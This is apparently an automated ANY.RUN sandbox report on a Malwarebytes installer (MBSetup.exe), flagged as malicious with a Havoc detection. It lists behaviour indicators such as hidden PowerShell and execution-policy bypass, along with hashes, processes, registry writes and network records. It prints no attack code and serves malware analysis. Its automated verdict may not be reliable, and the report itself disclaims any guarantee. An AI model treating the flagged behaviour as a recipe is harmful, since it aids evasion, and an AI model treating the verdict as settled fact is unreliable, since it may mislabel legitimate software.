File name:

MBSetup.exe

Full analysis: https://app.any.run/tasks/ac8e55e8-ae40-4542-954a-564098efe02e
Verdict: Malicious activity
Threats:

Havoc is an advanced post-exploitation framework used by hackers to take control of a system once they've breached it. With Havoc, attackers can run commands remotely, inject malicious processes, and access sensitive data. It's often used in targeted attacks, allowing cybercriminals to stay hidden in a network while stealing information or launching further attacks. Its flexibility and ability to bypass detection make it a serious threat, especially in environments that rely on traditional security tools.

Malware Trends Tracker     >>>
Analysis date: April 23, 2025, 23:47:42
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
connectwise
rmm-tool
stealer
possible-phishing
auto
havoc
arch-exec
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 5 sections
MD5:

B6D8B7E6F74196F62CABA2CA77A7AE91

SHA1:

6AC9C99F084B5772440E2F135B8D5365F7F45314

SHA256:

74B0BF9C17091AB1C6C61AF0AEFBC599F1ECC0FFF6DEE0144A3DFD5CD1F5E18F

SSDEEP:

98304:gWn8nBJ4ZfXM5t0X1NrH22IT1PD2222222721vFdGBeQN0aFvGSSRkrlcfABLqIL:DXL

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • HAVOC has been found (auto)

      • firefox.exe (PID: 968)
      • WinRAR.exe (PID: 5668)

    • Actions looks like stealing of personal data

      • MBAMService.exe (PID: 7808)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 8220)

    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 9164)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 8220)

  • SUSPICIOUS

    • Searches for installed software

      • MBSetup.exe (PID: 6808)
      • MBAMInstallerService.exe (PID: 664)
      • MBAMService.exe (PID: 7808)

    • Reads the BIOS version

      • MBSetup.exe (PID: 6808)
      • MBAMService.exe (PID: 7808)

    • Creates files in the driver directory

      • MBSetup.exe (PID: 6808)
      • MBAMInstallerService.exe (PID: 664)
      • MBVpnTunnelService.exe (PID: 4276)
      • drvinst.exe (PID: 7484)
      • MBAMService.exe (PID: 7728)
      • MBAMService.exe (PID: 7808)

    • The process verifies whether the antivirus software is installed

      • MBSetup.exe (PID: 6808)
      • MBAMInstallerService.exe (PID: 664)
      • MBVpnTunnelService.exe (PID: 4276)
      • drvinst.exe (PID: 7484)
      • MBAMService.exe (PID: 7728)
      • MBAMService.exe (PID: 7808)
      • Malwarebytes.exe (PID: 8820)
      • MBAMWsc.exe (PID: 8652)
      • Malwarebytes.exe (PID: 8900)
      • Malwarebytes.exe (PID: 8972)

    • Executable content was dropped or overwritten

      • MBSetup.exe (PID: 6808)
      • MBAMInstallerService.exe (PID: 664)
      • drvinst.exe (PID: 7484)
      • MBVpnTunnelService.exe (PID: 4276)
      • MBAMService.exe (PID: 7728)
      • MBAMService.exe (PID: 7808)

    • Executes as Windows Service

      • MBAMInstallerService.exe (PID: 664)
      • MBAMService.exe (PID: 7808)

    • Drops 7-zip archiver for unpacking

      • MBAMInstallerService.exe (PID: 664)

    • The process creates files with name similar to system file names

      • MBAMInstallerService.exe (PID: 664)

    • Drops a system driver (possible attempt to evade defenses)

      • MBAMInstallerService.exe (PID: 664)
      • MBVpnTunnelService.exe (PID: 4276)
      • drvinst.exe (PID: 7484)
      • MBAMService.exe (PID: 7728)
      • MBAMService.exe (PID: 7808)

    • Process drops legitimate windows executable

      • MBAMInstallerService.exe (PID: 664)
      • MBAMService.exe (PID: 7808)

    • The process drops C-runtime libraries

      • MBAMInstallerService.exe (PID: 664)

    • Adds/modifies Windows certificates

      • MBAMInstallerService.exe (PID: 664)
      • MBAMService.exe (PID: 7808)

    • Changes Internet Explorer settings (feature browser emulation)

      • MBAMInstallerService.exe (PID: 664)
      • MBAMService.exe (PID: 7808)

    • Creates or modifies Windows services

      • MBAMService.exe (PID: 7728)
      • MBAMService.exe (PID: 7808)

    • Creates/Modifies COM task schedule object

      • MBAMService.exe (PID: 7808)

    • Reads security settings of Internet Explorer

      • MBAMService.exe (PID: 7808)
      • ig.exe (PID: 1240)
      • WinRAR.exe (PID: 5668)
      • Malwarebytes.exe (PID: 8820)

    • Creates a software uninstall entry

      • MBAMInstallerService.exe (PID: 664)

    • Application launched itself

      • Malwarebytes.exe (PID: 8900)

    • Starts CMD.EXE for commands execution

      • WinRAR.exe (PID: 5668)

    • Downloads file from URI via Powershell

      • powershell.exe (PID: 8220)

    • The process executes Powershell scripts

      • cmd.exe (PID: 9164)

    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 9164)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 9164)

    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 9164)

    • There is functionality for taking screenshot (YARA)

      • Malwarebytes.exe (PID: 8820)

  • INFO

    • Reads the computer name

      • MBSetup.exe (PID: 6808)
      • MBAMInstallerService.exe (PID: 664)
      • MBVpnTunnelService.exe (PID: 4276)
      • drvinst.exe (PID: 7484)
      • MBAMService.exe (PID: 7728)
      • MBAMService.exe (PID: 7808)
      • ig.exe (PID: 1240)
      • MBAMWsc.exe (PID: 8652)
      • Malwarebytes.exe (PID: 8820)
      • Malwarebytes.exe (PID: 8900)
      • Malwarebytes.exe (PID: 8972)

    • The sample compiled with english language support

      • MBSetup.exe (PID: 6808)
      • MBAMInstallerService.exe (PID: 664)
      • MBVpnTunnelService.exe (PID: 4276)
      • drvinst.exe (PID: 7484)
      • MBAMService.exe (PID: 7808)
      • MBAMService.exe (PID: 7728)

    • Create files in a temporary directory

      • MBSetup.exe (PID: 6808)

    • Checks supported languages

      • MBSetup.exe (PID: 6808)
      • MBAMInstallerService.exe (PID: 664)
      • MBVpnTunnelService.exe (PID: 4276)
      • drvinst.exe (PID: 7484)
      • MBAMService.exe (PID: 7728)
      • MBAMService.exe (PID: 7808)
      • ig.exe (PID: 1240)
      • MBAMWsc.exe (PID: 8652)
      • Malwarebytes.exe (PID: 8820)
      • Malwarebytes.exe (PID: 8900)
      • Malwarebytes.exe (PID: 8972)

    • Reads the machine GUID from the registry

      • MBSetup.exe (PID: 6808)
      • MBAMInstallerService.exe (PID: 664)
      • drvinst.exe (PID: 7484)
      • MBAMService.exe (PID: 7808)

    • Creates files in the program directory

      • MBSetup.exe (PID: 6808)
      • MBAMInstallerService.exe (PID: 664)
      • MBVpnTunnelService.exe (PID: 4276)
      • MBAMService.exe (PID: 7808)
      • Malwarebytes.exe (PID: 8820)

    • Reads the software policy settings

      • MBSetup.exe (PID: 6808)
      • MBAMInstallerService.exe (PID: 664)
      • slui.exe (PID: 864)
      • slui.exe (PID: 4068)
      • drvinst.exe (PID: 7484)
      • MBAMService.exe (PID: 7808)
      • Malwarebytes.exe (PID: 8820)

    • Checks proxy server information

      • MBSetup.exe (PID: 6808)
      • slui.exe (PID: 4068)
      • powershell.exe (PID: 8220)
      • Malwarebytes.exe (PID: 8820)

    • The sample compiled with spanish language support

      • MBAMInstallerService.exe (PID: 664)

    • Manual execution by a user

      • firefox.exe (PID: 5416)
      • WinRAR.exe (PID: 5668)
      • Malwarebytes.exe (PID: 8900)

    • Application launched itself

      • firefox.exe (PID: 5416)
      • firefox.exe (PID: 968)

    • Adds/modifies Windows certificates

      • drvinst.exe (PID: 7484)

    • Reads Environment values

      • MBAMService.exe (PID: 7808)

    • CONNECTWISE has been detected

      • MBAMService.exe (PID: 7808)

    • Reads the time zone

      • MBAMService.exe (PID: 7808)

    • Reads CPU info

      • MBAMService.exe (PID: 7808)

    • Creates files or folders in the user directory

      • Malwarebytes.exe (PID: 8820)

    • Process checks computer location settings

      • Malwarebytes.exe (PID: 8820)

    • Disables trace logs

      • powershell.exe (PID: 8220)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 8220)

    • Process checks whether UAC notifications are on

      • Malwarebytes.exe (PID: 8820)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (76.4)
.exe | Win32 Executable (generic) (12.4)
.exe | Generic Win/DOS Executable (5.5)
.exe | DOS Executable Generic (5.5)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2024:03:19 17:48:54+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14.16
CodeSize: 750080
InitializedDataSize: 1796608
UninitializedDataSize: -
EntryPoint: 0x6ee6e
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows GUI
FileVersionNumber: 5.1.2.88
ProductVersionNumber: 0.0.0.0
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Windows NT 32-bit
ObjectFileType: Dynamic link library
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Unicode
CompanyName: Malwarebytes
FileDescription: Malwarebytes Setup
FileVersion: 5.1.2.88
LegalCopyright: Copyright (C) 2017 - 2024 Malwarebytes, Inc. All rights reserved.
InternalName: MBSetup.exe
OriginalFileName: MBSetup.exe
ProductName: Malwarebytes
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
175
Monitored processes
39
Malicious processes
12
Suspicious processes
3

Behavior graph

Click at the process to see the details
start mbsetup.exe sppextcomobj.exe no specs slui.exe mbaminstallerservice.exe slui.exe firefox.exe no specs #HAVOC firefox.exe firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs mbvpntunnelservice.exe conhost.exe no specs firefox.exe no specs drvinst.exe firefox.exe no specs firefox.exe no specs mbamservice.exe mbamservice.exe rundll32.exe no specs ig.exe no specs #HAVOC winrar.exe no specs help.exe no specs help.exe no specs mbamwsc.exe no specs malwarebytes.exe malwarebytes.exe no specs malwarebytes.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs svchost.exe mbsetup.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
664"C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe"C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe
services.exe
User:
SYSTEM
Company:
Malwarebytes
Integrity Level:
SYSTEM
Description:
Malwarebytes Installer Service
Exit code:
0
Version:
5.1.0.189
Modules
Images
c:\program files\malwarebytes\anti-malware\mbaminstallerservice.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\authz.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\cryptbase.dll
864"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exe
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
968"C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe
firefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
MEDIUM
Description:
Firefox
Exit code:
0
Version:
123.0
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\msvcp140.dll
c:\windows\system32\vcruntime140.dll
1096"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5536 -childID 5 -isForBrowser -prefsHandle 4920 -prefMapHandle 5060 -prefsLen 31243 -prefMapSize 244583 -jsInitHandle 1436 -jsInitLen 235124 -parentBuildID 20240213221259 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e67af47e-5544-4f83-9df5-91ccb0411543} 968 "\\.\pipe\gecko-crash-server-pipe.968" 19bcc69d310 tabC:\Program Files\Mozilla Firefox\firefox.exefirefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
MEDIUM
Description:
Firefox
Exit code:
0
Version:
123.0
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msvcp140.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\vcruntime140.dll
1240ig.exe secureC:\Users\admin\AppData\LocalLow\IGDump\sec\ig.exeMBAMService.exe
User:
admin
Company:
MalwareBytes
Integrity Level:
LOW
Description:
Malware Scanner
Exit code:
3235811341
Version:
1.0.4.8
Modules
Images
c:\program files\malwarebytes\anti-malware\ig.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\advapi32.dll
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2596"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4740 -parentBuildID 20240213221259 -sandboxingKind 0 -prefsHandle 4708 -prefMapHandle 4728 -prefsLen 36588 -prefMapSize 244583 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {17eb7c91-7b5a-4cf5-9f8a-01e6cc86a2b9} 968 "\\.\pipe\gecko-crash-server-pipe.968" 19bcac32310 utilityC:\Program Files\Mozilla Firefox\firefox.exefirefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
MEDIUM
Description:
Firefox
Exit code:
1
Version:
123.0
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\msvcp140.dll
c:\windows\system32\vcruntime140.dll
c:\windows\system32\vcruntime140_1.dll
c:\windows\system32\crypt32.dll
3968"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2916 -childID 1 -isForBrowser -prefsHandle 2312 -prefMapHandle 2564 -prefsLen 31447 -prefMapSize 244583 -jsInitHandle 1436 -jsInitLen 235124 -parentBuildID 20240213221259 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {25702e6c-992e-4145-bd4d-e2df55f2a7cc} 968 "\\.\pipe\gecko-crash-server-pipe.968" 19bc749cf50 tabC:\Program Files\Mozilla Firefox\firefox.exefirefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
MEDIUM
Description:
Firefox
Exit code:
0
Version:
123.0
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\msvcp140.dll
c:\windows\system32\vcruntime140.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\vcruntime140_1.dll
4068C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
4200"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2188 -parentBuildID 20240213221259 -prefsHandle 2180 -prefMapHandle 2176 -prefsLen 31031 -prefMapSize 244583 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {44f5f626-5bf4-4a2b-b8f5-77acd995c7f7} 968 "\\.\pipe\gecko-crash-server-pipe.968" 19bb5880710 socketC:\Program Files\Mozilla Firefox\firefox.exefirefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
MEDIUM
Description:
Firefox
Exit code:
0
Version:
123.0
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\msvcp140.dll
c:\windows\system32\vcruntime140.dll
Total events
295 818
Read events
294 852
Write events
936
Delete events
30

Modification events

(PID) Process:(6808) MBSetup.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Malwarebytes
Operation:writeName:id
Value:
ced8f4bdab0e451983652875cde488c0
(PID) Process:(6808) MBSetup.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Malwarebytes
Operation:writeName:id
Value:
ced8f4bdab0e451983652875cde488c0
(PID) Process:(6808) MBSetup.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\mbamtestkey
Operation:delete keyName:(default)
Value:
(PID) Process:(6808) MBSetup.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Malwarebytes
Operation:delete valueName:IrisFirstRun
Value:
(PID) Process:(6808) MBSetup.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MBAMInstallerService\Parameters
Operation:writeName:UserName
Value:
admin
(PID) Process:(6808) MBSetup.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MBAMInstallerService\Parameters
Operation:writeName:ProductCode
Value:
MBAM-C
(PID) Process:(6808) MBSetup.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MBAMInstallerService\Parameters
Operation:writeName:ProductBuild
Value:
consumer
(PID) Process:(6808) MBSetup.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MBAMInstallerService\Parameters
Operation:writeName:ProgramDirectory
Value:
C:\Program Files\Malwarebytes\Anti-Malware
(PID) Process:(6808) MBSetup.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MBAMInstallerService\Parameters
Operation:writeName:LocalAppDataDir
Value:
C:\Users\admin\AppData\Local
(PID) Process:(6808) MBSetup.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MBAMInstallerService\Parameters
Operation:writeName:Channel
Value:
release
Executable files
1 278
Suspicious files
467
Text files
100
Unknown types
0

Dropped files

PID
Process
Filename
Type
664MBAMInstallerService.exeC:\Windows\Temp\MBInstallTemp6efa4167209d11f089182420b137d17f\ctlrpkg.7z
MD5:
SHA256:
664MBAMInstallerService.exeC:\Windows\Temp\MBInstallTemp6efa4167209d11f089182420b137d17f\dbclspkg.7z
MD5:
SHA256:
664MBAMInstallerService.exeC:\Windows\Temp\MBInstallTemp6efa4167209d11f089182420b137d17f\dotnetpkg.7z
MD5:
SHA256:
6808MBSetup.exeC:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exeexecutable
MD5:CEA3222BD01165E983F7079C4DD88B11
SHA256:4D3204DD695B8A7E32A4E123B79D3470088CCAA3BDDAA187C2661445CA852344
6808MBSetup.exeC:\Windows\SysWOW64\drivers\mbamtestfile.dattext
MD5:9F06243ABCB89C70E0C331C61D871FA7
SHA256:837CCB607E312B170FAC7383D7CCFD61FA5072793F19A25E75FBACB56539B86B
664MBAMInstallerService.exeC:\Windows\Temp\MBInstallTemp6efa4167209d11f089182420b137d17f\servicepkg.7zcompressed
MD5:7842DAD4BFCDF6E64591A937D81B008D
SHA256:11AF576D85AC0CF666A1356BE4E75DCE8CD49B1A008F802270725F2F12058519
6808MBSetup.exeC:\Program Files (x86)\mbamtestfile.dattext
MD5:9F06243ABCB89C70E0C331C61D871FA7
SHA256:837CCB607E312B170FAC7383D7CCFD61FA5072793F19A25E75FBACB56539B86B
664MBAMInstallerService.exeC:\Windows\Temp\MBInstallTemp6efa4167209d11f089182420b137d17f\7z.dllexecutable
MD5:3430E2544637CEBF8BA1F509ED5A27B1
SHA256:BB01C6FBB29590D6D144A9038C2A7736D6925A6DBD31889538AF033E03E4F5FA
664MBAMInstallerService.exeC:\Windows\Temp\MBInstallTemp6efa4167209d11f089182420b137d17f\ctlrpkg\Assistant.deps.jsonbinary
MD5:CC1B068F1AC8C087A411861849A0948A
SHA256:335038102A92000713369FB753FFEDEDCFAB8C153E7CF24E5B678B5843BC90EA
664MBAMInstallerService.exeC:\Windows\Temp\MBInstallTemp6efa4167209d11f089182420b137d17f\servicepkg\srvversion.dattext
MD5:BE80F7D6E767D297EE70C67A875CE7D2
SHA256:6298849F84EEF383F90BB12CEE58D179901605B77B97A229B0316567D4FF1B7F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
40
TCP/UDP connections
112
DNS requests
162
Threats
4

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
23.48.23.166:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
2384
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
2384
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
968
firefox.exe
GET
200
34.107.221.82:80
http://detectportal.firefox.com/canonical.html
unknown
whitelisted
968
firefox.exe
GET
200
34.107.221.82:80
http://detectportal.firefox.com/success.txt?ipv4
unknown
whitelisted
968
firefox.exe
POST
200
142.250.186.35:80
http://o.pki.goog/s/wr3/cgo
unknown
whitelisted
968
firefox.exe
POST
200
184.24.77.79:80
http://r11.o.lencr.org/
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted
23.48.23.166:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
5496
MoUsoCoreWorker.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
6808
MBSetup.exe
54.148.100.197:443
api2.amplitude.com
AMAZON-02
US
whitelisted
3216
svchost.exe
172.211.123.249:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
6544
svchost.exe
20.190.160.132:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
  • 40.127.240.158
whitelisted
crl.microsoft.com
  • 23.48.23.166
  • 23.48.23.147
  • 23.48.23.143
  • 23.48.23.173
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
google.com
  • 142.250.185.110
whitelisted
api2.amplitude.com
  • 54.148.100.197
  • 44.240.131.133
  • 35.167.93.246
  • 52.41.237.253
  • 52.27.195.133
  • 52.13.4.69
  • 52.35.83.209
  • 54.149.217.201
  • 52.39.44.214
  • 35.82.121.129
  • 52.88.252.66
  • 44.230.55.168
  • 54.203.125.164
  • 54.71.192.135
  • 34.216.233.53
  • 54.212.150.180
whitelisted
client.wns.windows.com
  • 172.211.123.249
whitelisted
login.live.com
  • 20.190.160.132
  • 40.126.32.136
  • 40.126.32.140
  • 40.126.32.133
  • 20.190.160.14
  • 40.126.32.68
  • 20.190.160.130
  • 20.190.160.64
whitelisted
ocsp.digicert.com
  • 2.17.190.73
  • 184.30.131.245
whitelisted
slscr.update.microsoft.com
  • 4.175.87.197
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 52.165.164.15
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] Cloudflare R2 Storage (r2 .cloudflarestorage .com)
2196
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] Cloudflare R2 Storage (r2 .cloudflarestorage .com)
2196
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] Cloudflare R2 Storage (r2 .cloudflarestorage .com)
2196
svchost.exe
Possible Social Engineering Attempted
ET HUNTING Suspicious Netlify Hosted DNS Request - Possible Phishing Landing
Process
Message
MBAMService.exe
Retry XPE file open
MBAMService.exe
Retry XPE file open
MBAMService.exe
Retry XPE file open
MBAMService.exe
Retry XPE file open
MBAMService.exe
Retry XPE file open
MBAMService.exe
Retry XPE file open
MBAMService.exe
Retry XPE file open
MBAMService.exe
Retry XPE file open
MBAMService.exe
Retry XPE file open
MBAMService.exe
Retry XPE file open
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
MBSetup.exe